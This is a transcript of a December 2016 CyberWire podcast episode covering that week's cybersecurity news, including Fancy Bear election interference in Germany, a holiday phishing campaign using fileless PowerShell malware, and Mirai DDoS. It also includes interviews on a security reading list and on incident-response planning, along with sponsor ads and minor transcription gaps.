CyberWire Daily - Daily & Week in Review: Korean cyber alert amid a presidential impeachment. Germany calls out Fancy Bear for influence ops. Georgia—the Dixie one, not the one in the Caucasus—demands a cyber explanation. Holiday phishing, the enduring DDoS threat, and
Episode Date: December 9, 2016In today's podcast, South Korea braces for the North to take cyber advantage of a constitutional crisis, but so far all's quiet. (Or most is quiet, anyway.) Germany takes official notice that Fancy Be...ar is working to disrupt next year's elections. The US state of Georgia thinks DHS may have tried to penetrate its election system post-election, and it wants to know what's up. ISIS is back online, and calling for attacks against Americans and Shiites. A phishing campaign trolls customer service reps with fileless malware. Experts expect more Mirai-driven DDoS. Rick Howard from Palo Alto Networks tells about the Cybersecurity Canon. Caleb Barlow from IBM Security explains the importance of a well practiced resiliency plan. And the Avalanche criminal kingpin is on the lam after being sprung from a Ukrainian jail. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K. stay home with her young son. But her maternal instincts take a wild and surreal turn as she
discovers the best yet fiercest part of herself. Based on the acclaimed novel, Night Bitch is a
thought-provoking and wickedly humorous film from Searchlight Pictures. Stream Night Bitch January
24 only on Disney+.
Hey everybody, Dave here. Have you ever wondered where your personal information is lurking online?
Like many of you, I was concerned about my data being sold by data brokers.
So I decided to try DeleteMe.
I have to say, DeleteMe is a game changer.
Within days of signing up, they started removing my personal information from hundreds of data brokers.
I finally have peace of mind knowing my data privacy is protected.
Delete.me's team does all the work for you with detailed reports so you know exactly what's been done.
Take control of your data and keep your private life private by signing up for Delete.me.
Now at a special discount for our listeners.
private by signing up for Delete Me. Now at a special discount for our listeners, today get 20% off your Delete Me plan when you go to joindeleteme.com slash n2k and use promo code n2k
at checkout. The only way to get 20% off is to go to joindeleteme.com slash n2k and enter code
n2k at checkout. That's joindeleteme.com slash n2k code N2K at checkout. That's joindelete.me.com slash N2K, code N2K.
South Korea braces for the North to take cyber advantage of a constitutional crisis,
but so far it's mostly quiet.
Germany takes official notice that Fancy Bear is working to disrupt next year's elections.
The U.S. state of Georgia thinks DHS may have tried to penetrate its election system post-election,
and it wants to know what's up.
A phishing campaign trolls customer service reps with fileless malware.
Experts expect more Mirai-driven DDoS.
And the avalanche criminal kingpin is on the lam after being sprung from a Ukrainian jail.
I'm Dave Bittner in Baltimore with your CyberWire summary and week in review for Friday, December 9, 2016.
Seoul is on alert for cyberattacks from the North
as the Republic of Korea goes through the impeachment of its president.
President Park Geun-hye must step down today, at least temporarily,
until her position is finally decided by the Constitutional Court
as required by South Korean law.
Recently disclosed intrusions into South Korean defense networks
continue to look like
Pyongyang's work, and the Republic of Korea is preparing for more. But so far, cyberspace has
remained relatively quiet across the 38th parallel. As the U.S. Congress continues to rumble about
investigating Russian attempts to influence last month's elections, and the smart bipartisan money
is betting that there will be investigations.
Germany's BFV has confirmed that the Russians are up to much the same in Germany.
The BFV said yesterday in an official statement that the Russian organs, specifically Fancy
Bear, also known as APT28, have begun their attempts to disrupt the coming year's German
elections.
The BFV's statement leads with charges of propaganda, disinformation, and false flag operations.
The two Russian objectives, as the BFV explains them, have a familiar ring to them.
Fancy Bear aims to foster uncertainty in German society
and weaken or even destabilize the Federal Republic.
The other goal is to strengthen the hand and amplify the voice
of extremist groups and parties in Germany. Back in the U.S., the state of Georgia has asked that
the Department of Homeland Security explain what Georgia thinks looks like attempts by DHS
to penetrate the state's election systems on November 15, a week after the elections were
held. Georgia was one of a few states that declined DHS security help for the election,
and the state said it did so on constitutional grounds,
not wishing to let the federal camel push its nose into the tent of powers reserved to the states.
A letter Georgia's Secretary of State sent yesterday to the U.S. Secretary of Homeland Security
put the issue this way,
quote,
The private sector security provider that monitors the agency's firewall detected a large
unblocked scan event on November 15th at 8.43 a.m. The event was an IP address attempting to scan
certain aspects of the Georgia Secretary of State's infrastructure. The attempt to breach
our system was unsuccessful. At no time has my office agreed to or permitted DHS to conduct The letter asks, in effect, if the attempt was by DHS, and if so, whether it was authorized, inadvertent, or deliberate but unauthorized.
WSBTV2 Atlanta received this statement from DHS.
Quote, The Department of Homeland Security has received Secretary Kemp's letter. We are looking into the matter.
DHS takes the trust of our public and private sector partners seriously,
and we will respond to Secretary Kemp directly.
End quote.
The private sector security provider who detected and blocked the penetration has not been identified.
ISIS is back online, calling on its adherents to kill Shiites and Americans in Bahrain.
online calling on its adherents to kill Shiites and Americans in Bahrain. U.S. Secretary of Defense Carter's regional visit apparently inspired the attempt at murderous inspiration.
Security firm Proofpoint warns of a new criminal phishing campaign that loads an information
stealer in its victim systems. Called August, the campaign resembles in some of its techniques
recent Capers Trustwave researchers
have observed the Karbonak gang executing. Proofpoint is tracking the threat actors behind
August under the designation TA530, and they're calling their info stealer mundane, but they note
that it's being deployed in a way that makes it difficult to detect. It uses well-crafted emails
to customer service representatives that carry plausible subject lines, like duplicate charges, erroneous charges, shopping cart emptied,
things like that. Should the customer service rep open the attachment, typically a malicious
word document, August uses PowerShell script to filelessly install the InfoStealer.
It's worth noting that PowerShell exploitation is consistent with what Symantec has
observed in a recent study. 94.5% of PowerShell script, Symantec says, is malicious.
So why has August become so prominent in November and December, and why are the Carbonac hoods so
active? Michael Patterson, CEO of Plixer International, told the CyberWire that the
question practically answers itself.
"'Tis the ideal season for phishing attacks," he said.
When you're scrambling to process orders and deliver good customer service during the busiest of online shopping seasons,
it's fatally easy to click open when you should have clicked delete.
Patterson recommends more training, monitoring, and awareness during the holiday season.
We would add that while prudence, diligence, and vigilance are of course always vital,
don't be too hard on yourself or your service reps.
After all, opening email from customers is probably a big part of the job.
So take a look at ways of organizing your systems for security,
and in particular, look for ways of doing without attachments.
Here's one recommendation from Patterson that even a relatively small business could follow.
Set up somewhere for employees
to forward suspicious emails for inspection.
Distributed denial-of-service attacks
remain an unsolved problem,
especially since the general availability
of Mirai-herded Internet-of-Things botnets
has commodified DDoS attacks' capability
and put it within the range of even modestly
talented SCIDs. The SCIDs can even buy tech support services to help them along.
DDoS is also seeing a round of gamification in the Sledgehammer campaign being run in the
apparent interest of Ottoman revival. Travis Smith, senior security research engineer at
Tripwire, told us, quote,, in the cops and robbers department,
the avalanche criminal cloud and fraud as a service gang may have been raided and taken down, but its alleged kingpin is back on the lam.
Ukrainian authorities have called a be-on-the-lookout for Gennady Kapkhanov, who was captured in a shootout, cuffed, booked, jailed, and then released on a judge's order because of some local prosecutorial oversight.
You can easily find the Galutz mugshot on the internet.
Mr. Kapkanov is now in parts unknown.
We doubt he'll show up in Bug Tussle or Rabbit Hash or even Timonium,
Cliffside Park or Simi Valley anytime soon.
But if you see him, assume he's armed and dangerous.
Assume he's armed and dangerous.
Do you know the status of your compliance controls right now?
Like, right now.
We know that real-time visibility is critical for security,
but when it comes to our GRC programs, we rely on point-in-time checks.
But get this, more than 8,000 companies like Atlassian
and Quora have continuous visibility into their controls with Vanta. Here's the gist. Vanta brings
automation to evidence collection across 30 frameworks, like SOC 2 and ISO 27001.
They also centralize key workflows like policies, access reviews, and reporting,
and helps you get security questionnaires done
five times faster with AI.
Now that's a new way to GRC.
Get $1,000 off Vanta
when you go to vanta.com slash cyber.
That's vanta.com slash cyber for $1,000 off.
Cyber threats are evolving every second, and staying ahead is more than just a challenge.
It's a necessity.
That's why we're thrilled to partner with ThreatLocker,
a cybersecurity solution trusted by businesses worldwide.
ThreatLocker is a full suite of solutions designed to give you total control,
stopping unauthorized applications, securing sensitive data,
and ensuring your organization runs smoothly and securely.
Visit ThreatLocker.com today to see how a default
deny approach can keep your company safe and compliant.
Joining me once again is Rick Howard. He's the CSO at Palo Alto Networks.
He also heads up Unit 42, which is their threat intel team.
Rick, at Unit 42, you have something that you all call the Cybersecurity Canon.
That's your required reading list.
Tell us a little bit about the Cybersecurity Canon.
Yeah, we did this.
It started about three years ago.
I went to the RSA conference in San Francisco and presented a talk on here are some books
that you should have read by now.
It was about 25 books that I thought were kind of necessary to all of us.
And Palo Alto Networks decided to sponsor it.
So what we did is we created a rock and roll hall of fame for cybersecurity books.
We have an outside committee of 10 cybersecurity experts.
books. We have an outside committee of 10 cybersecurity experts. There are CISOs and journalists and consultants and lawyers, and they evaluate all the books on our candidate list. And
if you go to the website and look up Canon and Palo Alto Networks, you'll see all the books
that are in the candidate list. And you can't get on the list. This is not just a book list,
right? This is someone has made the case in a book review saying why all of us should have read this book by now.
And so there's some sweat and tears put into this to make those cases.
So we have, like I said, about 50, 60 books on the Canada list so far.
And every year the committee selects two or three to be inducted into the Hall of Fame.
Last year we put a bunch of them through because there were so many that were so good.
Future Crimes by Mark Goodman, Kingpin by Kevin Paulson, Cyber War by Richard Clark,
and a bunch of others that you would have heard of.
So it's very exciting that we get to do this here at Palo Alto Networks.
And so what are some of the additions to this year's list?
So there's three I'd like to highlight.
The first one I want to mention is a book that I really thought was exciting.
It's called The Phoenix Project.
It's been out for a little bit, and it is a novel that describes what DevOps is.
Now, I know everybody around our community has heard of DevOps and even think you know what it is. But the Phoenix Project is a story that will make you fully understand why DevOps is important,
why it is probably one of the best innovations in IT management since the personal computer was invented,
and how you might go about using those kind of techniques in your own organization.
I guess the second one I would really put on everybody's radar is the Hacking Exposed series.
These books have been around for a long time.
They cover lots of ground about all the aspects of cybersecurity
that we should know about.
So I highly recommend that all the network defenders in the world
take a look at that series of books.
All right, Rick, thanks again for joining us.
You bet. Anytime.
My guest today is Caleb Barlow.
He's a vice president with IBM Security and led the development of IBM's new X-Force Command,
which they call the world's most sophisticated cyber simulation environment.
IBM Security recently published a report titled The Global Cyber Resiliency Gap.
You know, we went out and found that more than 67% of organizations reported
that they weren't prepared to recover from cyber attacks.
Now, that's a sobering stat in and of itself until you get to the next one, which is that 75% have no formal response plan applied across their organization.
So, you know, I think part of what we found in this survey, which covered 2,000 security and IT professionals from around the world, is that as security professionals, a lot of folks have been focused on protecting and defending their environment, which is certainly important.
But now it's just as important to focus on what happens when you inevitably are breached.
How do you respond and how do you maintain that resiliency?
I think we hear that phrase, you know, it's not a matter of if, it's a matter of when, so much these days that it's almost a catchphrase.
Do you agree with that? We certainly have to plan for it to be in the case of when.
You know, it's no different than planning for what happens if there's a fire in our corporate headquarters
or an earthquake or, you know, some major economic downturn.
Just like anything else that we have a business resiliency plan for,
we need to have a business resiliency plan for cyber risk.
And to that point, the survey said that over half of the organizations had at least one data breach
in the past two years.
Yeah, 53% came back and said that they had had one in the past two years, right?
And what was interesting about that was it was everything
from advanced attackers to 74% said that they faced threats due to human error in the last year,
right? So, you know, that could be malicious activity or in many, if not most cases,
that's accidental activity or it's the quintessential case of someone clicking on a
link in a phishing email that they probably shouldn't have.
Take me through some of the reasons why people aren't doing a better job with this.
Well, you know, I think when we look at kind of cyber resiliency in general, first of all, you know, I think a lot of folks don't realize that when you're breached, you have to make a lot of decisions in near real time.
And these are
decisions that could have long lasting implications. This requires a leadership in crisis type of skill.
And, you know, that's not necessarily a muscle that a lot of C-level executives exercise on a
regular basis. So we want to be able to make sure we've practiced and rehearsed that well before something actually happens.
It's everything from who's in charge, how am I going to communicate,
how am I going to deal with regulators, with law enforcement, with my customers,
what am I going to say and how am I going to say it?
Because as much as your data might be on the line from the attackers,
so too is your business reputation with your customers, your business partners, and the public in general. Yeah, I mean, it reminds me of, you know,
even at the family level, you know, it's sort of how you gather your family together and say,
here's what we do in case there's a fire, you know, ahead of time. Because by the time you
smell smoke, it's too late, right? Well, it is. And just like you would have that conversation
with your family on, all right, here's how we exit the house, here's where we're all going to gather up.
I mean, I think, unfortunately, you know, the analogy to a fire drill is very important.
And one of the things we're doing at IBM is we've invested $200 million this year in incident response. And one of those key things here in Cambridge, Massachusetts,
is the first ever cyber range built out at full scale for the corporate enterprise.
These types of environments have existed in the past in kind of military and military contractors,
but this is a new environment where people can actually practice these types of breaches
and their response at scale.
So take me through how that works. If I'm an organization that wants to take
advantage of something like that, what would happen?
Well, what they do is they come with their team, not two or three people, but
you know, 10 to 20 people, and not just the security folks, the marketing team,
the legal team, the CEO, maybe a board member or two. And what we do is we put them through
a fictitious breach on a fictitious company. But this is done with a level of realism
in such a way that everything around them, from the videos, the audio, the keyboards that are in
front of them, is so highly realistic that we want to get their pulse raised
up. We want to force them to make some decisions under pressure so that they are experiencing it
much like if it was their own company. The only difference in this case is that the company isn't
real, but all the data is real. And we do this by having a large data center behind us, and
we effectively build out the IT environment of a Fortune 500 company.
The only difference in this case is we hack it and break it every day.
It's, frankly, a lot like a flight simulator.
When it comes to having plans, when it comes to being resilient against these sorts of attacks,
what kind of general advice do you have for people?
Well, I mean, obviously, have a plan, right?
Have rehearsed
that plan. But also, you want to go have relationships with all of the people that
you're going to need to bring in, whether it's the incident response team that you want to have
on retainer, your crisis communications team, your legal counsel. But also, you know, you want to
understand what are the regulatory environments in which you operate.
In the United States, for example, there's 47 different breach disclosure laws in the 50 U.S.
states. You want to have those playbooks already built to understand what do you need to disclose,
to whom, and how. It's just like the proverbial binder you'd see on the shelf in any office around what
to do in case of a medical emergency or a fire. You need that virtual binder built for what to do
in the event of a cyber attack. That's Caleb Barlow from IBM. You can find the Global Cyber
Resilience Gap Survey and learn more about IBM's cyber Range on the IBM Security website.
And now, a message from Black Cloak.
Did you know the easiest way for cyber criminals to bypass your company's defenses is by targeting your executives and their families
at home. Black Cloak's award-winning digital executive protection platform secures their
personal devices, home networks, and connected lives. Because when executives are compromised
at home, your company is at risk. In fact, over one-third of new members discover they've already been breached. Protect your executives and their families 24-7, 365 with Black Cloak.
Learn more at blackcloak.io.
And that's The Cyber Wire.
We are proudly produced in Maryland by our talented team of editors and producers.
I'm Dave Bittner. Thanks for listening.
Your business needs AI solutions that are not only ambitious, but also practical and adaptable. Thank you. Pure AI agents connect, prepare, and automate your data workflows, helping you gain insights,
receive alerts, and act with ease through guided apps tailored to your role.
Data is hard. Domo is easy. Learn more at ai.domo.com. That's ai.domo.com.